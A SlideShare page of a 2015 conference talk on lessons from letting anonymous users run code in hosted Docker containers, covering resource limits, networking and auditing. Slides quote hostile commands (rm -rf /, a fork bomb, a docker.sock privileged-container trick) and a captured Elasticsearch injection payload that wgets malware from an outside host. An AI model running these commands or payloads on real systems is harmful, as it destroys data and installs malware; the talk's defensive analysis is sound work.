SlideShare a Scribd company logo

Lessons from running potentially malicious code inside Docker containers

Download as PPTX, PDF
Ben Hall
Ben Hall

Lessons from http://www.joinscrapbook.com/ Presented at Container Camp 2015 on 11th September 2015

1 of 43
Lessons from running potentially malicious code inside containers @Ben_Hall Ben@BenHall.me.uk Ocelot Uproar / Scrapbook
@Ben_Hall / Blog.BenHall.me.uk Tech Support > Tester > Developer > Founder / Freelancer Software Development Studio WHOAMI?
“What happens when you give anonymous unrestricted access to a hosted Docker container & daemon?” This is how we [try to] protect ourselves
http://www.joinscrapbook.com
Multi-tenant system PaaS CI Servers Untrusted 3rd Parties Docker Security Practices
The first “hack”
$ whoami $ pwd $ cd / $ ls $ apt-get install <some package> $ passwd $ rm –rf /
Dockerfile RUN adduser <new user> USER <new user> $ docker run –u <new user>
$ uptime $ free -m $ df -h $ cat /proc/cpuinfo
If you can ping it, you can try to hack it --icc=false $ cat /etc/hosts 172.17.9.121 st_undefined_x7gd_RrD04w81FSQAANX 172.17.0.220 the-warden.bridge 172.17.9.118 st_nkxqyj_d2d.bridge 172.17.9.119 st_4jm1qk_d2d0 172.17.9.106 angry_blackwell
$ reboot $ shutdown now
“It also allows the container to access local network services + like D-bus and is therefore considered insecure” $ docker run --net=host -it ubuntu bash root@ubuntu:/# shutdown now root@ubuntu:/# $ docker run --net=host -it ubuntu bash Post http://docker:4243/v1.20/containers/create: EOF. * Are you trying to connect to a TLS-enabled daemon without TLS? * Is your docker daemon up and running?
Docker provides a lot out of the box but not everything…
CPU Shares
:(){ :|: & };:
$ docker run -d -u daemon --ulimit nproc=3 busybox top $ docker run -d -u daemon --ulimit nproc=3 busybox top $ docker run -d -u daemon --ulimit nproc=3 busybox top $ docker run -d -u daemon --ulimit nproc=3 busybox top efe086376f3d1b09f6d99fa1af8bfb6e021cdba9b363bd6ac10c07704239b398 Error response from daemon: Cannot start container efe086376f3d1b09f6d99fa1af8bfb6e021cdba9b363bd6ac10c07704239b398 : [8] System error: resource temporarily unavailable
$ while :; do echo 'Hello World'; done
$ fallocate Operation Not Supported $ truncate $ dd
Root users can write to it. If you can write to it, you can fill it. $ ls /docker/aufs/diff/<container-id>/ $ cat /docker/containers/<container-id>/hosts
Docker & IPTables provides inbound restrictions
Bandwidth
Difficult to restrict
Three issues CPU Disk Space Bandwidth
$ docker diff $ ~/.bash_history
Sysdig Very powerful. A lot of data. Built separate auditing service logging commands from users
The Warden Based on Docker Stats API Snort for Docker?
A lot more… • Privileged containers open up a world of pain • setuid / setgid • IPTables=false • docker.sock opens a lot of doors • Docker Images containing “presents”
$ docker run benhall/cute-kittens Error: Missing docker.sock Usage: docker run -v /var/run/docker.sock:/var/run/docker.sock benhall/cute-kittens $ docker run -v /var/run/docker.sock:/var/run/docker.sock benhall/cute-kittens
if [ -e /var/run/docker.sock ]; then echo "**** Launching ****” docker run --privileged busybox ls /dev echo "**** Cute kittens ****" else echo "Error: Missing docker.sock” fi
What happens when it all goes wrong?
Hosting provider becomes unhappy
org.elasticsearch.search.SearchParseException: [index][3]: query[ConstantScore(*:*)],from[-1],size[1]: Parse Failure [Failed to parse source [{"size":1,"query":{"filtered":{"query":{"match_all":{}}}},"script_fields":{"exp":{"s cript":"import java.util.*;nimport java.io.*;nString str = "";BufferedReader br = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec("wget -O /tmp/xdvi http://<IP Address>:9985/xdvi").getInputStream()));StringBuilder sb = new StringBuilder();while((str=br.readLine())!=null){sb.append(str);}sb.toString();" }}}]] http://blog.benhall.me.uk/2015/09/what-happens-when-an-elasticsearch-container-is-hacked/
C /bin C /bin/netstat C /bin/ps C /bin/ss C /etc C /etc/init.d A /etc/init.d/DbSecuritySpt A /etc/init.d/selinux C /etc/rc1.d A /etc/rc1.d/S97DbSecuritySpt A /etc/rc1.d/S99selinux C /etc/rc2.d A /etc/rc2.d/S97DbSecuritySpt A /etc/rc2.d/S99selinux C /etc/rc3.d A /etc/rc3.d/S97DbSecuritySpt A /etc/rc3.d/S99selinux C /etc/rc4.d A /etc/rc4.d/S97DbSecuritySpt A /etc/rc4.d/S99selinux C /etc/rc5.d http://blog.benhall.me.uk/2015/09/what-happens-when-an-elasticsearch-container-is-hacked/ A /etc/rc5.d/S97DbSecuritySpt A /etc/rc5.d/S99selinux C /etc/ssh A /etc/ssh/bfgffa A /os6 A /safe64 C /tmp A /tmp/.Mm2 A /tmp/64 A /tmp/6Sxx A /tmp/6Ubb A /tmp/DDos99 A /tmp/cmd.n A /tmp/conf.n A /tmp/ddos8 A /tmp/dp25 A /tmp/frcc A /tmp/gates.lod A /tmp/hkddos A /tmp/hsperfdata_root A /tmp/linux32 A /tmp/linux64 A /tmp/manager A /tmp/moni.lod A /tmp/nb A /tmp/o32 A /tmp/oba A /tmp/okml A /tmp/oni A /tmp/yn25 C /usr C /usr/bin A /usr/bin/.sshd A /usr/bin/dpkgd A /usr/bin/dpkgd/netstat A /usr/bin/dpkgd/ps A /usr/bin/dpkgd/ss
Is Docker Secure? • Yes. It’s as secure as your practices are. • ElasticSearch hack would have taken over entire box • I’ve pointed out the bad bits • New game, new rules to play by.
Thank you! @Ben_Hall Ben@BenHall.me.uk Blog.BenHall.me.uk www.joinScrapbook.com

Recommended

Running Docker in Development & Production (#ndcoslo 2015)
Running Docker in Development & Production (#ndcoslo 2015)Running Docker in Development & Production (#ndcoslo 2015)
Running Docker in Development & Production (#ndcoslo 2015)
Ben Hall
 
Real World Lessons on the Pain Points of Node.js Applications
Real World Lessons on the Pain Points of Node.js ApplicationsReal World Lessons on the Pain Points of Node.js Applications
Real World Lessons on the Pain Points of Node.js Applications
Ben Hall
 
Running Docker in Development & Production (DevSum 2015)
Running Docker in Development & Production (DevSum 2015)Running Docker in Development & Production (DevSum 2015)
Running Docker in Development & Production (DevSum 2015)
Ben Hall
 
Lessons from running potentially malicious code inside containers
Lessons from running potentially malicious code inside containersLessons from running potentially malicious code inside containers
Lessons from running potentially malicious code inside containers
Ben Hall
 
Real World Experience of Running Docker in Development and Production
Real World Experience of Running Docker in Development and ProductionReal World Experience of Running Docker in Development and Production
Real World Experience of Running Docker in Development and Production
Ben Hall
 
The How and Why of Windows containers
The How and Why of Windows containersThe How and Why of Windows containers
The How and Why of Windows containers
Ben Hall
 
Deploying Windows Containers on Windows Server 2016
Deploying Windows Containers on Windows Server 2016Deploying Windows Containers on Windows Server 2016
Deploying Windows Containers on Windows Server 2016
Ben Hall
 
Running .NET on Docker
Running .NET on DockerRunning .NET on Docker
Running .NET on Docker
Ben Hall
 

Recommended

Running Docker in Development & Production (#ndcoslo 2015)
Running Docker in Development & Production (#ndcoslo 2015)Running Docker in Development & Production (#ndcoslo 2015)
Running Docker in Development & Production (#ndcoslo 2015)
Ben Hall
 
Real World Lessons on the Pain Points of Node.js Applications
Real World Lessons on the Pain Points of Node.js ApplicationsReal World Lessons on the Pain Points of Node.js Applications
Real World Lessons on the Pain Points of Node.js Applications
Ben Hall
 
Running Docker in Development & Production (DevSum 2015)
Running Docker in Development & Production (DevSum 2015)Running Docker in Development & Production (DevSum 2015)
Running Docker in Development & Production (DevSum 2015)
Ben Hall
 
Lessons from running potentially malicious code inside containers
Lessons from running potentially malicious code inside containersLessons from running potentially malicious code inside containers
Lessons from running potentially malicious code inside containers
Ben Hall
 
Real World Experience of Running Docker in Development and Production
Real World Experience of Running Docker in Development and ProductionReal World Experience of Running Docker in Development and Production
Real World Experience of Running Docker in Development and Production
Ben Hall
 
The How and Why of Windows containers
The How and Why of Windows containersThe How and Why of Windows containers
The How and Why of Windows containers
Ben Hall
 
Deploying Windows Containers on Windows Server 2016
Deploying Windows Containers on Windows Server 2016Deploying Windows Containers on Windows Server 2016
Deploying Windows Containers on Windows Server 2016
Ben Hall
 
Running .NET on Docker
Running .NET on DockerRunning .NET on Docker
Running .NET on Docker
Ben Hall
 
Docker, c'est bonheur !
Docker, c'est bonheur !Docker, c'est bonheur !
Docker, c'est bonheur !
Alexandre Salomé
 
Real World Lessons on the Pain Points of Node.JS Application
Real World Lessons on the Pain Points of Node.JS ApplicationReal World Lessons on the Pain Points of Node.JS Application
Real World Lessons on the Pain Points of Node.JS Application
Ben Hall
 
Docker perl build
Docker perl buildDocker perl build
Docker perl build
Workhorse Computing
 
JDO 2019: Tips and Tricks from Docker Captain - Łukasz Lach
JDO 2019: Tips and Tricks from Docker Captain - Łukasz LachJDO 2019: Tips and Tricks from Docker Captain - Łukasz Lach
JDO 2019: Tips and Tricks from Docker Captain - Łukasz Lach
PROIDEA
 
Deploying applications to Windows Server 2016 and Windows Containers
Deploying applications to Windows Server 2016 and Windows ContainersDeploying applications to Windows Server 2016 and Windows Containers
Deploying applications to Windows Server 2016 and Windows Containers
Ben Hall
 
Docker remote-api
Docker remote-apiDocker remote-api
Docker remote-api
Eric Ahn
 
Docker Runtime Security
Docker Runtime SecurityDocker Runtime Security
Docker Runtime Security
Sysdig
 
Light my-fuse
Light my-fuseLight my-fuse
Light my-fuse
Workhorse Computing
 
Docker - from development to production (PHPNW 2017-09-05)
Docker - from development to production (PHPNW 2017-09-05)Docker - from development to production (PHPNW 2017-09-05)
Docker - from development to production (PHPNW 2017-09-05)
Toby Griffiths
 
Making environment for_infrastructure_as_code
Making environment for_infrastructure_as_codeMaking environment for_infrastructure_as_code
Making environment for_infrastructure_as_code
Soshi Nemoto
 
Docker command
Docker commandDocker command
Docker command
Eric Ahn
 
PHP development with Docker
PHP development with DockerPHP development with Docker
PHP development with Docker
Yosh de Vos
 
Docker practice
Docker practiceDocker practice
Docker practice
wonyong hwang
 
Fabric workshop(1) - (MOSG)
Fabric workshop(1) - (MOSG)Fabric workshop(1) - (MOSG)
Fabric workshop(1) - (MOSG)
Soshi Nemoto
 
Vagrant for real (codemotion rome 2016)
Vagrant for real (codemotion rome 2016)Vagrant for real (codemotion rome 2016)
Vagrant for real (codemotion rome 2016)
Michele Orselli
 
Docker security
Docker securityDocker security
Docker security
Janos Suto
 
Configuration Surgery with Augeas
Configuration Surgery with AugeasConfiguration Surgery with Augeas
Configuration Surgery with Augeas
Puppet
 
DevOps(3) : Ansible - (MOSG)
DevOps(3) : Ansible - (MOSG)DevOps(3) : Ansible - (MOSG)
DevOps(3) : Ansible - (MOSG)
Soshi Nemoto
 
Preparation study of_docker - (MOSG)
Preparation study of_docker - (MOSG)Preparation study of_docker - (MOSG)
Preparation study of_docker - (MOSG)
Soshi Nemoto
 
手把手帶你學Docker 03042017
手把手帶你學Docker 03042017手把手帶你學Docker 03042017
手把手帶你學Docker 03042017
Paul Chao
 
Continuous deployment
Continuous deploymentContinuous deployment
Continuous deployment
Ben Hall
 
Testing ASP.NET - Progressive.NET
Testing ASP.NET - Progressive.NETTesting ASP.NET - Progressive.NET
Testing ASP.NET - Progressive.NET
Ben Hall
 

More Related Content

What's hot

Docker, c'est bonheur !
Docker, c'est bonheur !Docker, c'est bonheur !
Docker, c'est bonheur !
Alexandre Salomé
 
Real World Lessons on the Pain Points of Node.JS Application
Real World Lessons on the Pain Points of Node.JS ApplicationReal World Lessons on the Pain Points of Node.JS Application
Real World Lessons on the Pain Points of Node.JS Application
Ben Hall
 
Docker perl build
Docker perl buildDocker perl build
Docker perl build
Workhorse Computing
 
JDO 2019: Tips and Tricks from Docker Captain - Łukasz Lach
JDO 2019: Tips and Tricks from Docker Captain - Łukasz LachJDO 2019: Tips and Tricks from Docker Captain - Łukasz Lach
JDO 2019: Tips and Tricks from Docker Captain - Łukasz Lach
PROIDEA
 
Deploying applications to Windows Server 2016 and Windows Containers
Deploying applications to Windows Server 2016 and Windows ContainersDeploying applications to Windows Server 2016 and Windows Containers
Deploying applications to Windows Server 2016 and Windows Containers
Ben Hall
 
Docker remote-api
Docker remote-apiDocker remote-api
Docker remote-api
Eric Ahn
 
Docker Runtime Security
Docker Runtime SecurityDocker Runtime Security
Docker Runtime Security
Sysdig
 
Light my-fuse
Light my-fuseLight my-fuse
Light my-fuse
Workhorse Computing
 
Docker - from development to production (PHPNW 2017-09-05)
Docker - from development to production (PHPNW 2017-09-05)Docker - from development to production (PHPNW 2017-09-05)
Docker - from development to production (PHPNW 2017-09-05)
Toby Griffiths
 
Making environment for_infrastructure_as_code
Making environment for_infrastructure_as_codeMaking environment for_infrastructure_as_code
Making environment for_infrastructure_as_code
Soshi Nemoto
 
Docker command
Docker commandDocker command
Docker command
Eric Ahn
 
PHP development with Docker
PHP development with DockerPHP development with Docker
PHP development with Docker
Yosh de Vos
 
Docker practice
Docker practiceDocker practice
Docker practice
wonyong hwang
 
Fabric workshop(1) - (MOSG)
Fabric workshop(1) - (MOSG)Fabric workshop(1) - (MOSG)
Fabric workshop(1) - (MOSG)
Soshi Nemoto
 
Vagrant for real (codemotion rome 2016)
Vagrant for real (codemotion rome 2016)Vagrant for real (codemotion rome 2016)
Vagrant for real (codemotion rome 2016)
Michele Orselli
 
Docker security
Docker securityDocker security
Docker security
Janos Suto
 
Configuration Surgery with Augeas
Configuration Surgery with AugeasConfiguration Surgery with Augeas
Configuration Surgery with Augeas
Puppet
 
DevOps(3) : Ansible - (MOSG)
DevOps(3) : Ansible - (MOSG)DevOps(3) : Ansible - (MOSG)
DevOps(3) : Ansible - (MOSG)
Soshi Nemoto
 
Preparation study of_docker - (MOSG)
Preparation study of_docker - (MOSG)Preparation study of_docker - (MOSG)
Preparation study of_docker - (MOSG)
Soshi Nemoto
 
手把手帶你學Docker 03042017
手把手帶你學Docker 03042017手把手帶你學Docker 03042017
手把手帶你學Docker 03042017
Paul Chao
 

What's hot (20)

Docker, c'est bonheur !
Docker, c'est bonheur !Docker, c'est bonheur !
Docker, c'est bonheur !
 
Real World Lessons on the Pain Points of Node.JS Application
Real World Lessons on the Pain Points of Node.JS ApplicationReal World Lessons on the Pain Points of Node.JS Application
Real World Lessons on the Pain Points of Node.JS Application
 
Docker perl build
Docker perl buildDocker perl build
Docker perl build
 
JDO 2019: Tips and Tricks from Docker Captain - Łukasz Lach
JDO 2019: Tips and Tricks from Docker Captain - Łukasz LachJDO 2019: Tips and Tricks from Docker Captain - Łukasz Lach
JDO 2019: Tips and Tricks from Docker Captain - Łukasz Lach
 
Deploying applications to Windows Server 2016 and Windows Containers
Deploying applications to Windows Server 2016 and Windows ContainersDeploying applications to Windows Server 2016 and Windows Containers
Deploying applications to Windows Server 2016 and Windows Containers
 
Docker remote-api
Docker remote-apiDocker remote-api
Docker remote-api
 
Docker Runtime Security
Docker Runtime SecurityDocker Runtime Security
Docker Runtime Security
 
Light my-fuse
Light my-fuseLight my-fuse
Light my-fuse
 
Docker - from development to production (PHPNW 2017-09-05)
Docker - from development to production (PHPNW 2017-09-05)Docker - from development to production (PHPNW 2017-09-05)
Docker - from development to production (PHPNW 2017-09-05)
 
Making environment for_infrastructure_as_code
Making environment for_infrastructure_as_codeMaking environment for_infrastructure_as_code
Making environment for_infrastructure_as_code
 
Docker command
Docker commandDocker command
Docker command
 
PHP development with Docker
PHP development with DockerPHP development with Docker
PHP development with Docker
 
Docker practice
Docker practiceDocker practice
Docker practice
 
Fabric workshop(1) - (MOSG)
Fabric workshop(1) - (MOSG)Fabric workshop(1) - (MOSG)
Fabric workshop(1) - (MOSG)
 
Vagrant for real (codemotion rome 2016)
Vagrant for real (codemotion rome 2016)Vagrant for real (codemotion rome 2016)
Vagrant for real (codemotion rome 2016)
 
Docker security
Docker securityDocker security
Docker security
 
Configuration Surgery with Augeas
Configuration Surgery with AugeasConfiguration Surgery with Augeas
Configuration Surgery with Augeas
 
DevOps(3) : Ansible - (MOSG)
DevOps(3) : Ansible - (MOSG)DevOps(3) : Ansible - (MOSG)
DevOps(3) : Ansible - (MOSG)
 
Preparation study of_docker - (MOSG)
Preparation study of_docker - (MOSG)Preparation study of_docker - (MOSG)
Preparation study of_docker - (MOSG)
 
手把手帶你學Docker 03042017
手把手帶你學Docker 03042017手把手帶你學Docker 03042017
手把手帶你學Docker 03042017
 

Viewers also liked

Continuous deployment
Continuous deploymentContinuous deployment
Continuous deployment
Ben Hall
 
Testing ASP.NET - Progressive.NET
Testing ASP.NET - Progressive.NETTesting ASP.NET - Progressive.NET
Testing ASP.NET - Progressive.NET
Ben Hall
 
What Designs Need To Know About Visual Design
What Designs Need To Know About Visual DesignWhat Designs Need To Know About Visual Design
What Designs Need To Know About Visual Design
Ben Hall
 
Taking advantage of the Amazon Web Services (AWS) Family
Taking advantage of the Amazon Web Services (AWS) FamilyTaking advantage of the Amazon Web Services (AWS) Family
Taking advantage of the Amazon Web Services (AWS) Family
Ben Hall
 
Node.js Anti Patterns
Node.js Anti PatternsNode.js Anti Patterns
Node.js Anti Patterns
Ben Hall
 
The Art Of Building Prototypes and MVPs
The Art Of Building Prototypes and MVPsThe Art Of Building Prototypes and MVPs
The Art Of Building Prototypes and MVPs
Ben Hall
 
Kata - Devops CDSummit LA 2015
Kata - Devops CDSummit LA 2015 Kata - Devops CDSummit LA 2015
Kata - Devops CDSummit LA 2015
John Willis
 
Learning Patterns for the Overworked Developer
Learning Patterns for the Overworked DeveloperLearning Patterns for the Overworked Developer
Learning Patterns for the Overworked Developer
Ben Hall
 
Alibaba Cloud Conference 2016 - Docker Open Source
Alibaba Cloud Conference 2016 - Docker Open Source Alibaba Cloud Conference 2016 - Docker Open Source
Alibaba Cloud Conference 2016 - Docker Open Source
John Willis
 
Implementing Google's Material Design Guidelines
Implementing Google's Material Design GuidelinesImplementing Google's Material Design Guidelines
Implementing Google's Material Design Guidelines
Ben Hall
 
Architecting .NET Applications for Docker and Container Based Deployments
Architecting .NET Applications for Docker and Container Based DeploymentsArchitecting .NET Applications for Docker and Container Based Deployments
Architecting .NET Applications for Docker and Container Based Deployments
Ben Hall
 
How I learned to stop worrying and love the cloud
How I learned to stop worrying and love the cloudHow I learned to stop worrying and love the cloud
How I learned to stop worrying and love the cloud
Shlomo Swidler
 
Tips on solving E_TOO_MANY_THINGS_TO_LEARN with Kubernetes
Tips on solving E_TOO_MANY_THINGS_TO_LEARN with KubernetesTips on solving E_TOO_MANY_THINGS_TO_LEARN with Kubernetes
Tips on solving E_TOO_MANY_THINGS_TO_LEARN with Kubernetes
Ben Hall
 
Shipping Applications to Production in Containers with Docker
Shipping Applications to Production in Containers with DockerShipping Applications to Production in Containers with Docker
Shipping Applications to Production in Containers with Docker
Jérôme Petazzoni
 

Viewers also liked (14)

Continuous deployment
Continuous deploymentContinuous deployment
Continuous deployment
 
Testing ASP.NET - Progressive.NET
Testing ASP.NET - Progressive.NETTesting ASP.NET - Progressive.NET
Testing ASP.NET - Progressive.NET
 
What Designs Need To Know About Visual Design
What Designs Need To Know About Visual DesignWhat Designs Need To Know About Visual Design
What Designs Need To Know About Visual Design
 
Taking advantage of the Amazon Web Services (AWS) Family
Taking advantage of the Amazon Web Services (AWS) FamilyTaking advantage of the Amazon Web Services (AWS) Family
Taking advantage of the Amazon Web Services (AWS) Family
 
Node.js Anti Patterns
Node.js Anti PatternsNode.js Anti Patterns
Node.js Anti Patterns
 
The Art Of Building Prototypes and MVPs
The Art Of Building Prototypes and MVPsThe Art Of Building Prototypes and MVPs
The Art Of Building Prototypes and MVPs
 
Kata - Devops CDSummit LA 2015
Kata - Devops CDSummit LA 2015 Kata - Devops CDSummit LA 2015
Kata - Devops CDSummit LA 2015
 
Learning Patterns for the Overworked Developer
Learning Patterns for the Overworked DeveloperLearning Patterns for the Overworked Developer
Learning Patterns for the Overworked Developer
 
Alibaba Cloud Conference 2016 - Docker Open Source
Alibaba Cloud Conference 2016 - Docker Open Source Alibaba Cloud Conference 2016 - Docker Open Source
Alibaba Cloud Conference 2016 - Docker Open Source
 
Implementing Google's Material Design Guidelines
Implementing Google's Material Design GuidelinesImplementing Google's Material Design Guidelines
Implementing Google's Material Design Guidelines
 
Architecting .NET Applications for Docker and Container Based Deployments
Architecting .NET Applications for Docker and Container Based DeploymentsArchitecting .NET Applications for Docker and Container Based Deployments
Architecting .NET Applications for Docker and Container Based Deployments
 
How I learned to stop worrying and love the cloud
How I learned to stop worrying and love the cloudHow I learned to stop worrying and love the cloud
How I learned to stop worrying and love the cloud
 
Tips on solving E_TOO_MANY_THINGS_TO_LEARN with Kubernetes
Tips on solving E_TOO_MANY_THINGS_TO_LEARN with KubernetesTips on solving E_TOO_MANY_THINGS_TO_LEARN with Kubernetes
Tips on solving E_TOO_MANY_THINGS_TO_LEARN with Kubernetes
 
Shipping Applications to Production in Containers with Docker
Shipping Applications to Production in Containers with DockerShipping Applications to Production in Containers with Docker
Shipping Applications to Production in Containers with Docker
 

Similar to Lessons from running potentially malicious code inside Docker containers

Docker 基本概念與指令操作
Docker 基本概念與指令操作Docker 基本概念與指令操作
Docker 基本概念與指令操作
NUTC, imac
 
Docker workshop
Docker workshopDocker workshop
Docker workshopEvans Ye
 
Docker workshop DevOpsDays Amsterdam 2014
Docker workshop DevOpsDays Amsterdam 2014Docker workshop DevOpsDays Amsterdam 2014
Docker workshop DevOpsDays Amsterdam 2014
Pini Reznik
 
Docker Security workshop slides
Docker Security workshop slidesDocker Security workshop slides
Docker Security workshop slides
Docker, Inc.
 
Introduction to Docker
Introduction to DockerIntroduction to Docker
Introduction to Docker
皓鈞 張
 
Plug-ins: Building, Shipping, Storing, and Running - Nandhini Santhanam and T...
Plug-ins: Building, Shipping, Storing, and Running - Nandhini Santhanam and T...Plug-ins: Building, Shipping, Storing, and Running - Nandhini Santhanam and T...
Plug-ins: Building, Shipping, Storing, and Running - Nandhini Santhanam and T...
Docker, Inc.
 
Docker Introductory workshop
Docker Introductory workshopDocker Introductory workshop
Docker Introductory workshop
Runcy Oommen
 
Be a happier developer with Docker: Tricks of the trade
Be a happier developer with Docker: Tricks of the tradeBe a happier developer with Docker: Tricks of the trade
Be a happier developer with Docker: Tricks of the trade
Nicola Paolucci
 
Why everyone is excited about Docker (and you should too...) - Carlo Bonamic...
Why everyone is excited about Docker (and you should too...) - Carlo Bonamic...Why everyone is excited about Docker (and you should too...) - Carlo Bonamic...
Why everyone is excited about Docker (and you should too...) - Carlo Bonamic...
Codemotion
 
Tribal Nova Docker workshop
Tribal Nova Docker workshopTribal Nova Docker workshop
Tribal Nova Docker workshop
Nicolas Degardin
 
codemotion-docker-2014
codemotion-docker-2014codemotion-docker-2014
codemotion-docker-2014
Carlo Bonamico
 
[Devconf.cz][2017] Understanding OpenShift Security Context Constraints
[Devconf.cz][2017] Understanding OpenShift Security Context Constraints[Devconf.cz][2017] Understanding OpenShift Security Context Constraints
[Devconf.cz][2017] Understanding OpenShift Security Context Constraints
Alessandro Arrichiello
 
Be a Happier Developer with Docker: Tricks of the Trade
Be a Happier Developer with Docker: Tricks of the TradeBe a Happier Developer with Docker: Tricks of the Trade
Be a Happier Developer with Docker: Tricks of the TradeDocker, Inc.
 
Dockerizing a Symfony2 application
Dockerizing a Symfony2 applicationDockerizing a Symfony2 application
Dockerizing a Symfony2 application
Roman Rodomansky
 
Very Early Review - Rocket(CoreOS)
Very Early Review - Rocket(CoreOS)Very Early Review - Rocket(CoreOS)
Very Early Review - Rocket(CoreOS)
충섭 김
 
ABCs of docker
ABCs of dockerABCs of docker
ABCs of docker
Sabyrzhan Tynybayev
 
Docker for mere mortals
Docker for mere mortalsDocker for mere mortals
Docker for mere mortals
Henryk Konsek
 
Hands on introduction to docker security for docker newbies
Hands on introduction to docker security for docker newbiesHands on introduction to docker security for docker newbies
Hands on introduction to docker security for docker newbies
Yigal Elefant
 
Wordpress y Docker, de desarrollo a produccion
Wordpress y Docker, de desarrollo a produccionWordpress y Docker, de desarrollo a produccion
Wordpress y Docker, de desarrollo a produccion
Sysdig
 
時代在變 Docker 要會:台北 Docker 一日入門篇
時代在變 Docker 要會:台北 Docker 一日入門篇時代在變 Docker 要會:台北 Docker 一日入門篇
時代在變 Docker 要會:台北 Docker 一日入門篇
Philip Zheng
 

Similar to Lessons from running potentially malicious code inside Docker containers (20)

Docker 基本概念與指令操作
Docker 基本概念與指令操作Docker 基本概念與指令操作
Docker 基本概念與指令操作
 
Docker workshop
Docker workshopDocker workshop
Docker workshop
 
Docker workshop DevOpsDays Amsterdam 2014
Docker workshop DevOpsDays Amsterdam 2014Docker workshop DevOpsDays Amsterdam 2014
Docker workshop DevOpsDays Amsterdam 2014
 
Docker Security workshop slides
Docker Security workshop slidesDocker Security workshop slides
Docker Security workshop slides
 
Introduction to Docker
Introduction to DockerIntroduction to Docker
Introduction to Docker
 
Plug-ins: Building, Shipping, Storing, and Running - Nandhini Santhanam and T...
Plug-ins: Building, Shipping, Storing, and Running - Nandhini Santhanam and T...Plug-ins: Building, Shipping, Storing, and Running - Nandhini Santhanam and T...
Plug-ins: Building, Shipping, Storing, and Running - Nandhini Santhanam and T...
 
Docker Introductory workshop
Docker Introductory workshopDocker Introductory workshop
Docker Introductory workshop
 
Be a happier developer with Docker: Tricks of the trade
Be a happier developer with Docker: Tricks of the tradeBe a happier developer with Docker: Tricks of the trade
Be a happier developer with Docker: Tricks of the trade
 
Why everyone is excited about Docker (and you should too...) - Carlo Bonamic...
Why everyone is excited about Docker (and you should too...) - Carlo Bonamic...Why everyone is excited about Docker (and you should too...) - Carlo Bonamic...
Why everyone is excited about Docker (and you should too...) - Carlo Bonamic...
 
Tribal Nova Docker workshop
Tribal Nova Docker workshopTribal Nova Docker workshop
Tribal Nova Docker workshop
 
codemotion-docker-2014
codemotion-docker-2014codemotion-docker-2014
codemotion-docker-2014
 
[Devconf.cz][2017] Understanding OpenShift Security Context Constraints
[Devconf.cz][2017] Understanding OpenShift Security Context Constraints[Devconf.cz][2017] Understanding OpenShift Security Context Constraints
[Devconf.cz][2017] Understanding OpenShift Security Context Constraints
 
Be a Happier Developer with Docker: Tricks of the Trade
Be a Happier Developer with Docker: Tricks of the TradeBe a Happier Developer with Docker: Tricks of the Trade
Be a Happier Developer with Docker: Tricks of the Trade
 
Dockerizing a Symfony2 application
Dockerizing a Symfony2 applicationDockerizing a Symfony2 application
Dockerizing a Symfony2 application
 
Very Early Review - Rocket(CoreOS)
Very Early Review - Rocket(CoreOS)Very Early Review - Rocket(CoreOS)
Very Early Review - Rocket(CoreOS)
 
ABCs of docker
ABCs of dockerABCs of docker
ABCs of docker
 
Docker for mere mortals
Docker for mere mortalsDocker for mere mortals
Docker for mere mortals
 
Hands on introduction to docker security for docker newbies
Hands on introduction to docker security for docker newbiesHands on introduction to docker security for docker newbies
Hands on introduction to docker security for docker newbies
 
Wordpress y Docker, de desarrollo a produccion
Wordpress y Docker, de desarrollo a produccionWordpress y Docker, de desarrollo a produccion
Wordpress y Docker, de desarrollo a produccion
 
時代在變 Docker 要會:台北 Docker 一日入門篇
時代在變 Docker 要會:台北 Docker 一日入門篇時代在變 Docker 要會:台北 Docker 一日入門篇
時代在變 Docker 要會:台北 Docker 一日入門篇
 

More from Ben Hall

The Art Of Documentation - NDC Porto 2022
The Art Of Documentation - NDC Porto 2022The Art Of Documentation - NDC Porto 2022
The Art Of Documentation - NDC Porto 2022
Ben Hall
 
The Art Of Documentation for Open Source Projects
The Art Of Documentation for Open Source ProjectsThe Art Of Documentation for Open Source Projects
The Art Of Documentation for Open Source Projects
Ben Hall
 
Three Years of Lessons Running Potentially Malicious Code Inside Containers
Three Years of Lessons Running Potentially Malicious Code Inside ContainersThree Years of Lessons Running Potentially Malicious Code Inside Containers
Three Years of Lessons Running Potentially Malicious Code Inside Containers
Ben Hall
 
Containers without docker
Containers without dockerContainers without docker
Containers without docker
Ben Hall
 
Deploying windows containers with kubernetes
Deploying windows containers with kubernetesDeploying windows containers with kubernetes
Deploying windows containers with kubernetes
Ben Hall
 
The Art of Documentation and Readme.md for Open Source Projects
The Art of Documentation and Readme.md for Open Source ProjectsThe Art of Documentation and Readme.md for Open Source Projects
The Art of Documentation and Readme.md for Open Source Projects
Ben Hall
 
How Secure Are Docker Containers?
How Secure Are Docker Containers?How Secure Are Docker Containers?
How Secure Are Docker Containers?
Ben Hall
 
The Challenges of Becoming Cloud Native
The Challenges of Becoming Cloud NativeThe Challenges of Becoming Cloud Native
The Challenges of Becoming Cloud Native
Ben Hall
 
Scaling Docker Containers using Kubernetes and Azure Container Service
Scaling Docker Containers using Kubernetes and Azure Container ServiceScaling Docker Containers using Kubernetes and Azure Container Service
Scaling Docker Containers using Kubernetes and Azure Container Service
Ben Hall
 
The art of documentation and readme.md
The art of documentation and readme.mdThe art of documentation and readme.md
The art of documentation and readme.md
Ben Hall
 
Experimenting and Learning Kubernetes and Tensorflow
Experimenting and Learning Kubernetes and TensorflowExperimenting and Learning Kubernetes and Tensorflow
Experimenting and Learning Kubernetes and Tensorflow
Ben Hall
 
Real World Lessons On The Anti-Patterns of Node.JS
Real World Lessons On The Anti-Patterns of Node.JSReal World Lessons On The Anti-Patterns of Node.JS
Real World Lessons On The Anti-Patterns of Node.JS
Ben Hall
 
Learning to think "The Designer Way"
Learning to think "The Designer Way"Learning to think "The Designer Way"
Learning to think "The Designer Way"
Ben Hall
 

More from Ben Hall (13)

The Art Of Documentation - NDC Porto 2022
The Art Of Documentation - NDC Porto 2022The Art Of Documentation - NDC Porto 2022
The Art Of Documentation - NDC Porto 2022
 
The Art Of Documentation for Open Source Projects
The Art Of Documentation for Open Source ProjectsThe Art Of Documentation for Open Source Projects
The Art Of Documentation for Open Source Projects
 
Three Years of Lessons Running Potentially Malicious Code Inside Containers
Three Years of Lessons Running Potentially Malicious Code Inside ContainersThree Years of Lessons Running Potentially Malicious Code Inside Containers
Three Years of Lessons Running Potentially Malicious Code Inside Containers
 
Containers without docker
Containers without dockerContainers without docker
Containers without docker
 
Deploying windows containers with kubernetes
Deploying windows containers with kubernetesDeploying windows containers with kubernetes
Deploying windows containers with kubernetes
 
